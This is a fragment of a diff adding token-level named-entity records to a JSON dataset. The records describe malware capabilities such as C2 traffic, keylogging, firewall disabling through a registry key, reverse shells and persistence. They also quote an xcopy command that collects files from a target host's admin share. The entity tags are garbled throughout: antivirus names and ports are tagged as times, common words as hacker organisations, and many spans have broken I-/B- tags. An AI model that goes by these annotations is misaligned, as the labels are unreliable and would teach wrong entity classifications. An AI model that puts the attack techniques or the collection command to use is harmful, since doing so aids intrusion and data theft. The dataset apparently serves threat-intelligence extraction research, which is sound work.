"O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "gathers", + "the", + "victim's", + "IP", + "address", + "and", + "domain", + "information,", + "and", + "then", + "sends", + "it", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "can", + "add", + "a", + "new", + "service", + "to", + "ensure", + "PlugX", + "persists", + "on", + "the", + "system", + "when", + "delivered", + "as", + "another", + "payload", + "onto", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "variants", + "of", + "the", + "Zeroaccess", + "Trojan", + "have", + "been", + "known", + "to", + "store", + "data", + "in", + "Extended", + "Attributes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeroaccess", + "is", + "a", + "kernel-mode", + "rootkit." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "can", + "hook", + "GetClipboardData", + "function", + "to", + "watch", + "for", + "clipboard", + "pastes", + "to", + "collect." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "obfuscates", + "the", + "macro", + "commands", + "in", + "its", + "initial", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "can", + "launch", + "remote", + "scripts", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "hooks", + "processes", + "by", + "leveraging", + "its", + "own", + "IAT", + "hooked", + "functions." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "decrypts", + "strings", + "in", + "the", + "code", + "during", + "the", + "execution", + "process." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "encrypts", + "strings", + "with", + "XOR.", + "Zeus", + "Panda", + "also", + "encrypts", + "all", + "configuration", + "and", + "settings", + "in", + "AES", + "and", + "RC4." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "has", + "a", + "command", + "to", + "delete", + "a", + "file.", + "It", + "also", + "can", + "uninstall", + "scripts", + "and", + "delete", + "files", + "to", + "cover", + "its", + "track." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "searches", + "for", + "specific", + "directories", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "can", + "download", + "additional", + "malware", + "plug-in", + "modules", + "and", + "execute", + "them", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "can", + "perform", + "keylogging", + "on", + "the", + "victim’s", + "machine", + "by", + "hooking", + "the", + "functions", + "TranslateMessage", + "and", + "WM_KEYDOWN." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "modifies", + "several", + "Registry", + "keys", + "under", + "<code>HKCU\\Software\\Microsoft\\Internet", + "Explorer\\", + "PhishingFilter\\</code>", + "to", + "disable", + "phishing", + "filters." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "checks", + "processes", + "on", + "the", + "system", + "and", + "if", + "they", + "meet", + "the", + "necessary", + "requirements,", + "it", + "injects", + "into", + "that", + "process." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "uses", + "PowerShell", + "to", + "download", + "and", + "execute", + "the", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "checks", + "for", + "running", + "processes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "checks", + "for", + "the", + "existence", + "of", + "a", + "Registry", + "key", + "and", + "if", + "it", + "contains", + "certain", + "values." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "adds", + "persistence", + "by", + "creating", + "Registry", + "Run", + "keys." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "can", + "take", + "screenshots", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "checks", + "to", + "see", + "if", + "anti-virus,", + "anti-spyware,", + "or", + "firewall", + "products", + "are", + "installed", + "in", + "the", + "victim’s", + "environment." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "collects", + "the", + "OS", + "version,", + "system", + "architecture,", + "computer", + "name,", + "product", + "ID,", + "install", + "date,", + "and", + "information", + "on", + "the", + "keyboard", + "mapping", + "to", + "determine", + "the", + "language", + "used", + "on", + "the", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "queries", + "the", + "system's", + "keyboard", + "mapping", + "to", + "determine", + "the", + "language", + "used", + "on", + "the", + "system.", + "It", + "will", + "terminate", + "execution", + "if", + "it", + "detects", + "LANG_RUSSIAN,", + "LANG_BELARUSIAN,", + "LANG_KAZAK,", + "or", + "LANG_UKRAINIAN." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "collects", + "the", + "current", + "system", + "time", + "(UTC)", + "and", + "sends", + "it", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zeus", + "Panda", + "can", + "launch", + "an", + "interface", + "where", + "it", + "can", + "execute", + "several", + "commands", + "on", + "the", + "victim’s", + "PC." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "has", + "the", + "ability", + "to", + "upload", + "files", + "from", + "a", + "targeted", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "has", + "been", + "encoded", + "with", + "Base64." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "has", + "the", + "ability", + "to", + "leverage", + "local", + "and", + "remote", + "exploits", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "can", + "enumerate", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "can", + "download", + "files", + "to", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "has", + "the", + "ability", + "to", + "list", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Zox", + "has", + "the", + "ability", + "to", + "use", + "SMB", + "for", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "has", + "used", + "the", + ".PNG", + "file", + "format", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zox", + "can", + "enumerate", + "attached", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "command", + "to", + "clear", + "system", + "event", + "logs." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "command", + "called", + "RunAs,", + "which", + "creates", + "a", + "new", + "process", + "as", + "another", + "user", + "or", + "process", + "context." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "hooks", + "several", + "API", + "functions", + "to", + "spawn", + "system", + "threads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "transfer", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "disable", + "the", + "firewall", + "by", + "modifying", + "the", + "registry", + "key", + "<code>HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Purp", + "I-Features", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "kill", + "AV", + "products'", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "is", + "injected", + "into", + "a", + "shared", + "SVCHOST", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "feature", + "to", + "perform", + "SYN", + "flood", + "attack", + "on", + "a", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "been", + "dropped", + "through", + "exploitation", + "of", + "CVE-2011-2462,", + "CVE-2013-3163,", + "and", + "CVE-2014-0322." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "delete", + "files", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "used", + "FTP", + "for", + "C2", + "connections." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "command", + "to", + "open", + "a", + "file", + "manager", + "and", + "explorer", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "command", + "to", + "transfer", + "files", + "from", + "a", + "remote", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "feature", + "to", + "capture", + "a", + "remote", + "computer's", + "keystrokes", + "using", + "a", + "keylogger." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "feature", + "to", + "create", + "local", + "user", + "accounts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "create", + "Registry", + "entries", + "to", + "enable", + "services", + "to", + "run." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "leverage", + "native", + "API", + "including", + "<code>RegisterServiceCtrlHandler", + "</code>", + "to", + "register", + "a", + "service.RegisterServiceCtrlHandler" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "launch", + "port", + "scans." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "use", + "ports", + "1985", + "and", + "1986", + "in", + "HTTP/S", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Time", + "O", + "B-Time", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "command,", + "ps,", + "to", + "obtain", + "a", + "listing", + "of", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "set", + "up", + "an", + "HTTP", + "or", + "SOCKS", + "proxy." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "query", + "the", + "netsvc", + "group", + "value", + "data", + "located", + "in", + "the", + "svchost", + "group", + "Registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "remote", + "desktop", + "functionality." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "other", + "DLLs", + "and", + "named", + "pipes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "create", + "a", + "new", + "service", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "collect", + "the", + "local", + "hostname,", + "operating", + "system", + "details,", + "CPU", + "speed,", + "and", + "total", + "physical", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "collect", + "the", + "owner", + "and", + "organization", + "information", + "from", + "the", + "target", + "workstation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "check", + "the", + "services", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "supports", + "functionality", + "for", + "VNC", + "sessions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "a", + "command", + "to", + "perform", + "video", + "device", + "spying." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "has", + "used", + "HTTP", + "for", + "C2", + "connections." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "launch", + "a", + "reverse", + "command", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxShell", + "can", + "create", + "a", + "new", + "service", + "using", + "the", + "service", + "parser", + "function", + "ProcessScCommand." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "used", + "a", + "XOR", + "key", + "to", + "decrypt", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "been", + "encoded", + "to", + "avoid", + "detection", + "from", + "static", + "analysis", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "can", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "relied", + "on", + "victims", + "to", + "open", + "a", + "malicious", + "attachment", + "delivered", + "via", + "email." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "been", + "disguised", + "as", + "a", + "Windows", + "security", + "update", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "used", + "API", + "functions", + "such", + "as", + "`Process32First`,", + "`Process32Next`,", + "and", + "`ShellExecuteA`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "created", + "a", + "snapshot", + "of", + "running", + "processes", + "using", + "`CreateToolhelp32Snapshot`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "can", + "search", + "the", + "registry", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "used", + "scheduled", + "tasks", + "for", + "persistence", + "and", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "can", + "search", + "a", + "compromised", + "host", + "to", + "determine", + "if", + "it", + "is", + "running", + "Windows", + "Defender", + "or", + "Kasperky", + "antivirus." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "been", + "distributed", + "via", + "spearphishing", + "emails,", + "usually", + "containing", + "a", + "malicious", + "RTF", + "or", + "Excel", + "attachment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "has", + "collected", + "the", + "host", + "name", + "and", + "operating", + "system", + "product", + "name", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZxxZ", + "can", + "collect", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "adbupd", + "contains", + "a", + "copy", + "of", + "the", + "OpenSSL", + "library", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "adbupd", + "can", + "run", + "a", + "copy", + "of", + "cmd.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "adbupd", + "can", + "use", + "a", + "WMI", + "script", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "at", + "can", + "be", + "used", + "to", + "schedule", + "a", + "task", + "on", + "a", + "system", + "to", + "be", + "executed", + "at", + "a", + "specific", + "date", + "or", + "time." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "has", + "the", + "ability", + "to", + "download", + "files", + "from", + "C2", + "to", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "has", + "added", + "itself", + "to", + "the", + "Registry", + "Run", + "key", + "as", + "\"NVIDIA\"", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "has", + "the", + "ability", + "to", + "use", + "the", + "<code>WinExec</code>", + "API", + "to", + "execute", + "malware", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "has", + "the", + "ability", + "to", + "add", + "itself", + "to", + "the", + "Registry", + "Run", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "has", + "the", + "ability", + "to", + "detect", + "if", + "the", + "infected", + "host", + "is", + "running", + "an", + "anti-virus", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "can", + "extract", + "malware", + "from", + "a", + "downloaded", + "JPEG." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "has", + "the", + "ability", + "to", + "send", + "system", + "volume", + "information", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "build_downer", + "has", + "the", + "ability", + "to", + "determine", + "the", + "local", + "time", + "to", + "ensure", + "malware", + "installation", + "only", + "happens", + "during", + "the", + "hours", + "that", + "the", + "infected", + "system", + "is", + "active." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "has", + "used", + "`xcopy", + "\\\\<target_host>\\c$\\users\\public\\path.7z", + "c:\\users\\public\\bin\\<target_host>.7z", + "/H", + "/Y`", + "to", + "archive", + "collected", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "be", + "used", + "to", + "automatically", + "collect", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "collect", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "upload", + "collected", + "data", + "and", + "files", + "to", + "an", + "FTP", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "delete", + "files", + "and", + "folders", + "from", + "compromised", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ccf32", + "can", + "parse", + "collected", + "files", + "to", + "identify", + "specific", + "file", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + 